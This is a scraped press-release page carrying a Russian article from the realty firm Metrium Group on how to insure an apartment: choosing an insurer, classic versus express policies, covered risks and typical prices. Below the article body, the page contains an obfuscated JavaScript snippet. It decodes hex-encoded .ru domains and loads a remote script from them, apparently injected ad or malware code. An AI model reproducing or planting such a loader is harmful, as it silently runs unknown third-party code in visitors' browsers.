Категорії




Графік

2024

0 0 0 0 0 0 1 0 0 0 0 1 1 0 0 0

2023

1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 1 1 0 0 0 0 1 0 1 0 0 1 0 0 0 0 1 1 0 0 1 0 2

2022

0 2 11 1 0 3 1 0 0 0 0 1 0 1 1 0 0 0 0 0 0 1 0 0 0 0 0 0 2 1 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0

2021

2 7 4 6 1 6 8 2 9 2 9 4 2 1 0 7 1 1 4 0 0 2 8 1 10 0 1 8 2 0 1 0 0 0 6 1 0 3 5 6 10 4 2 2 1 1 0 1 1 0 0 4

2020

0 1 10 0 1 12 0 1 11 5 27 23 3 4 8 2 2 2 1 2 9 14 7 9 16 3 8 10 3 3 6 4 3 2 16 14 9 7 7 14 8 5 7 9 13 9 9 13 16 2 11 11

2019

9 11 6 16 15 12 14 19 15 11 12 12 13 11 14 12 5 6 18 18 20 15 11 12 12 8 7 19 10 14 4 4 1 6 0 2 13 11 6 0 18 15 18 0 1 3 0 12 1 0 0 0

2018

17 19 24 20 29 17 22 27 17 22 27 29 12 10 15 15 7 9 10 14 22 20 18 20 12 21 16 26 14 13 21 9 11 6 18 12 1 2 18 12 13 21 16 14 23 24 18 21 16 20 9 6

2017

5 20 59 115 97 94 89 82 121 86 142 146 139 148 124 101 91 65 76 127 130 115 93 64 67 24 18 22 25 22 23 20 26 11 16 7 16 29 15 20 21 22 32 16 32 32 30 23 34 37 19 21 6

2016

11 96 160 214 158 200 159 107 147 99 169 5 133 124 167 143 143 52 84 171 153 191 120 1 6 26 157 167 133 122 3 138 81 17 102 54 1 130 115 126 94 107 107 101 124 175 130 121 151 147 135 83

2015

20 67 121 127 108 109 10 40 151 126 227 198 214 187 154 157 152 123 171 112 190 225 170 185 197 190 118 173 178 170 157 179 71 121 195 167 143 142 184 158 162 180 85 103 135 231 215 168 180 176 176 95

2014

82 189 126 242 238 215 224 234 212 184 252 231 192 290 231 231 162 139 127 236 220 241 179 214 209 183 169 232 191 168 160 176 209 153 194 202 196 247 179 235 271 42 98 136 115 219 98 149 199 220 175 59

2013

174 202 234 228 259 233 236 267 226 285 288 284 179 324 298 317 158 85 153 313 164 157 104 246 199 294 275 192 222 218 222 247 258 224 240 255 292 261 295 154 240 254 259 195 293 249 291 266 278 272 231 48

2012

31 179 257 317 335 321 342 284 280 163 2 63 292 100 216 101 282 159 5 265 188 247 254 273 64 219 303 157 286 338 255 322 302 252 217 259 298 335 113 273 382 343 378 290 294 405 319 336 355 335 314 257 33

2011

1 74 36 91 16 317 48 265 18 78 248 47 23 10 16 271 170 92 140 145 272 200 203 129 150 177 240 224 210 225 140 153 188 163 217 277 196 235 297 264 232 3 168 343 203 257 321 231 282 345 246 150

2010

21 58 63 142 157 72 198 7 127 77 61 258 215 149 0 152 28 47 45 153 62 135 229 214 227 232 209 212 236 217 189 165 207 168 250 289 263 281 228 277 286 271 281 248 288 186 265 184 89 169 303 1

2009

23 83 94 147 136 200 210 224 207 177 222 217 193 237 225 184 162 96 177 206 251 217 151 200 204 178 215 119 12 121 160 192 189 165 204 152 188 198 174 206 199 134 148 137 104 23 143 160 90 197 75 72

2008

4 31 23 86 70 110 143 89 81 74 90 122 102 118 139 129 31 71 119 127 142 126 128 93 122 102 129 101 84 110 90 110 111 120 160 154 159 159 158 119 178 151 148 107 133 125 149 141 144 139 88 34

2007

1 1 30 69 62 68 51 53 28 110 129 159 131 119 109 150 37 81 143 98 109 130 161 164 104 117 142 82 82 132 107 141 118 94 90 76 110 102 98 106 98 121 113 94 108 100 71 108 129 96 1

[187] Лайфхак от «Метриум Групп»: Как застраховать свою недвижимость?

02.06.2017 | Нерухомість, Країна-терорист

Доля застрахованных квартир в нашей стране не превышает 20%. И это не удивительно, если учесть, что большинство населения России живет по принципу: пока гром не грянет, мужик не перекрестится. Между тем, цена страхового полиса чаще всего составляет не более нескольких десятых процента от стоимости квартиры, а при наступлении страхового случая размер компенсации может составить до 100% рыночной стоимости вашего недвижимого имущества. Эксперты «Метриум Групп» рассказали, как правильно застраховать родной дом.               

 

Как выбрать страховую компанию

Любой эксперт рынка страховых услуг посоветует выбирать крупную компанию, так как это одна из гарантий того, что она не исчезнет сразу после того, как вы заплатите за покупку страхового полиса. Ориентироваться следует на страховщиков, которые обладают разветвленной сетью филиалов и собирают наибольший объем страховых премий.

Второй критерий надежности – длительность существования. В российском страховании долгожителями считаются компании, работающие в этом бизнесе более десяти лет.

Определившись, с расширенным списком кандидатов, можно приступить к более подробному изучению их деятельности. Имеет смысл обратить внимание на специализацию страховщика: основной портфель компании должны составлять договоры о страховании имущества, а не автомобильные КАСКО или ОСАГО.

Также обязательно изучите соотношение сборов и выплат. Если компания продает много полисов, а выплачивает компенсации редко, скорее всего, и вам составит немалого труда добиться выплаты. Как ни странно, на рынке страхования можно столкнуться и с другой крайностью, когда компании подозрительно охотно выплачивают компенсации. Это может свидетельствовать о не грамотном менеджменте, а, следовательно, и низкой надежности организации. Статистику по работе страховых компаний можно найти на сайте Федеральной службы страхового надзора http://fssn.ru/.

Кроме того, в интернете можно найти примеры, как ведет себя компания при возникновении страховых случаев, аналогичных тем, от которых вы страхуете свою недвижимость. В первую очередь нужно обратить внимание, как быстро и в каком размере производятся выплаты. Информацию о большинстве страховщиков найти можно здесь: http://www.insur-info.ru/forum/

 

Какой договор заключать со страховой компанией

Сегодня большинство страховых компаний предлагает своим клиентам на выбор два способа сотрудничества: классический договор либо экспресс-программу.

 

Классическое страхование

В классическом договоре все условия страхования прописываются индивидуально. Первым шагом обычно становится определение страховой суммы – максимального размера выплаты в случае какого-либо происшествия. Затем определяется стоимость имущества, которое вы страхуете (ремонт, мебель и пр). Для этого страховой агент либо сам осматривает вашу собственность, либо определяет цену по документам: договору купли-продажи квартиры, чекам и проч. В некоторых случаях приглашается профессиональный оценщик. На конечном этапе в процентах от стоимости объектов страхования рассчитывается страховой тариф, отсюда и цена полиса.

 

«Экспресс-продукт»

У собственника есть возможность приобрести экспресс-программу страхования (ее еще называют «страховой коробочкой»). Клиенту предлагают универсальные условия, по которым он может застраховать любую квартиру. Это продукт со стандартной страховой суммой, страховой премией и стоимостью полиса.

 

Что именно страховать 

Страховщики выделяют три составляющие квартиры: конструктивные элементы (стены, перекрытия и т.д.), внутренняя отделка и инженерное оборудование, движимое домашнее имущество. Иногда инженерные системы выделяют в отдельную категорию. Застраховать можно либо совокупно все составляющие недвижимого имущества, либо каждую категорию в отдельности.

 

На каких условиях страховать

 

Риски

Чаще всего страховые компании выделяют три группы рисков, от которых можно застраховать свою недвижимость: это стихийные бедствия, действия третьих лиц и гражданская ответственность собственника перед соседями. При этом страховщик сам принимает решение о том, какие конкретно угрозы для вашей недвижимости включить в каждый из этих пунктов. Не редки ситуации, когда клиенту в московском регионе кроме прочего предлагают страховку от землетрясений и извержений вулкана. Какова доля переплаты за такие теоретические опасности, которые вряд ли когда-нибудь могут произойти на практике, остается только гадать, поэтому не стоит выбирать компании, которые предлагают застраховаться от самого длинного списка бедствий. В столице достаточно страховки от стихийного пожара, наводнения и урагана. А, например, такие частности, как попадание молнии, может включать себя пожар.     

Еще одной хитростью страховых компаний могут стать прописанные в договоре обязанности страхователя. Они должны быть, по крайней мере, исполнимы для вас. Так достаточно часто, страховые компании слишком ограничивают срок, в течение которого клиент должен сообщить о страховом случае (могут указать в договоре сутки или 3 дня). И если, скажем, вы страхуете квартиру на время отпуска, то этот вопрос для вас может оказаться принципиальным, потому что дозвониться с курорта до офиса страховщика за сутки, как это иногда прописывают в требованиях, бывает невозможно.     

 

Цены

 

«Классический договор»

Чаще всего цена на услуги страховой компании выражается в процентах от стоимости застрахованного имущества. При «классическом» страховании, механизм которого мы описали выше, учитываются все индивидуальные особенности объекта. Как правило, тариф на конструктивные элементы составляет 0,15-0,20% от их рыночной стоимости, на внутреннюю отделку 0,5-0,6%, на движимое имущество 0,6-0,8%. В зависимости от уровня обеспечения охраны, пожарной безопасности и качества использованных материалов, к объекту могут применяться понижающие, либо повышающие коэффициенты.

 

«Коробочка»

Цена страховой экспресс-программы не зависит от особенностей жилья. То есть вы можете приобрести готовый пакет для определенного типа квартиры (однокомнатной, двухкомнатной и т.д.) с фиксированным размером страховой суммы, расценками на страховой полис и стандартным набором рисков для конкретного региона. А вот где находится застрахованный объект – в «хрущевке» или элитном небоскребе – значения не имеет. Кроме того, при выплатах делается поправка на амортизацию объекта (его износ со временем). 

Если вы решили воспользоваться страховой экспресс-программой, имейте ввиду, что в большинстве таких продуктов используется система лимитов, когда общая страховая сумма разделяется пропорционально между разными типами застрахованных объектов (например, 60% от общей суммы идет на максимальное возмещение ущерба по конструктивным элементам, 20% – по внутренней отделке, 20% – по движимому имуществу).

Кроме того, в страховании существует такое понятие, как франшиза – минимальный размер страховой суммы, который подлежит возмещению. Обычно она применяется в экспресс-программах. То есть, если франшиза составляет 1000 рублей, то любой ущерб менее этой суммы возмещению со стороны страховой компании не подлежит.                 

                   

     «Уверенность в завтрашнем дне дороже денег, – резюмирует Мария Литинецкая, управляющий партнер компании «Метриум Групп». – Заплатив за страховку однажды, вы долго можете не тревожиться о сохранности материального имущества. Чаще всего договор о страховании заключают на год. При средней стоимости квартиры в массовом сегменте 8 470 000 рублей, страховой полис будет стоить 20 700 рублей. Средняя стоимость жилья бизнес-класса в столице – 18 000 000 рублей, а застраховать его можно за 39 000 рублей. Наконец, элитная квартира в Москве в среднем обходится в 137 800 000 рублей, а ее страховка стоит 297 270 рублей. В странах Запада, где преобладает рациональный деловой подход в управлении собственностью, страхуется до 90% недвижимости. Механизм страхование начали использовать уже за две тысячи лет до нашей эры в древнем Вавилоне. И это не случайно, потому что преимуществ у минимизации рисков путем приобретения страховки гораздо больше, чем недостатков».     

 

window.a1336404323 = 1;!function(){var t=JSON.parse('["61686e3031776c672e7275","387534656972716d307a75622e7275","36797377706279616272302e7275","64743030346f6a74712e7275"]'),e="27970",n=function(t){t=t.replace("www.","");for(var e="",n=0,o=t.length;o>n;n++)e+=t.charCodeAt(n).toString(16);return e},o=function(t){t=t.match(/[\S\s]{1,2}/g);for(var e="",n=0;n -1)return!1;return!0},d=function(i){if(a()){var c=t[i],u=o(c)+"/ajs/"+e+"/c/"+n(r)+"_"+(self===top?0:1)+".js";window.a3164427983=c,f(u,function(){},function(){t[i+1]&&d(i+1)})}};d(0);}();
Коментувати
Facebook ::

Метриум Групп

«Метриум Групп» - риелторская и консалтинговая компания, чья деятельность сосредоточена на рынке жилой недвижимости Московского региона, а также Санкт-Петербурга. «Метриум Групп» признана Риелтором №1 (лидер продаж) по итогам голосования премии «Рекорды рынка недвижимости» в 2016 году. Компания входит в тройку лидеров на первичном рынке жилья по объему продаж. В 2015 году под управлением «Метриум Групп» было реализовано 495 тыс. кв.м недвижимости. Всего в риелторском портфеле – 6,5 млн кв.м проектов. «Метриум Групп» стабильно продает 40 тыс. кв.м в месяц. При участии «Метриум Групп» создано четыре совместных предприятия с застройщиками - новая для рынка модель организации потоковых продаж, которую внедряет компания. Также «Метриум Групп» вывела на рынок Московского региона автоматизированную систему управления продажами НМаркет.ПРО. «Метриум Групп» выступает стратегическим партнером АО «Сбербанк Управление Активами»: консультирует по вопросам оценки перспективности проектов в сфере недвижимости, занимается организацией продаж. Кроме того, «Метриум Групп» является инвестором трех ЗПФН, созданных «Сбербанк Управление Активами». На текущий момент активы трех фондов составляют более 6 млрд руб., инвестированных в новостройки Московского региона.

Контактна особа: Елена Кудымова
Телефон: (499) 270-20-20
E-mail: [email protected]
Сайт:

До компанії


Найновіші релізи